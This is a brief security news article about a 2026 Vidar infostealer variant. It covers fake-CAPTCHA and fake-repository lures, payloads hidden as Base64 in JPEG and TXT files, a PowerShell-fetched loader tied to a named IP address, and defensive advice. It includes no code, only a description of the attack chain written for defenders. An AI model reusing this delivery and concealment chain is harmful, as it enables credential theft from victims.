Vidar Infostealer Spreads via Fake CAPTCHAs, Hides in JPEG and TXT Files

Since its first appearance in 2020, the Vidar infostealer has been a staple of credential‑theft operations, primarily targeting passwords stored in browsers. The latest 2026 variant, disclosed by Point Wild’s Lat61 threat‑intelligence team, marks a strategic shift from a straightforward password grabber to a modular, file‑less attack framework. By embedding malicious code inside everyday assets such as JPEG images and plain‑text files, the actors exploit the trust users place in familiar file types. This evolution mirrors a broader industry trend where adversaries prioritize social engineering and covert delivery mechanisms over traditional software vulnerabilities.

The campaign begins with deceptive vectors: fake CAPTCHA pages on compromised WordPress sites, counterfeit GitHub repositories labeled as “Claude Code,” and Discord or Reddit posts promising game cheats. When a victim runs the supplied command, a VBScript launches PowerShell, which fetches a Go‑compiled loader from an IP address (62.60.226.200). The loader reads Base64 strings hidden inside the downloaded JPEG or TXT files, reconstructs the final Vidar payload, and executes it via .NET reflective loading. Throughout, the malware relies on Living‑off‑the‑Land binaries like WScript, PowerShell, and RegAsm.exe to blend with legitimate processes.

From a defensive standpoint, the file‑less nature of this attack defeats many endpoint scanners that rely on static file signatures. Network monitoring must therefore focus on anomalous outbound connections to obscure IP ranges and the unusual use of legitimate Windows binaries for payload delivery. Organizations should enforce strict download policies, educate developers about the risks of unofficial repositories, and deploy behavioral analytics capable of spotting in‑memory execution patterns. As Vidar continues to refine its covert channels, the line between benign content and malicious code will blur, demanding a more proactive, threat‑intel‑driven security posture.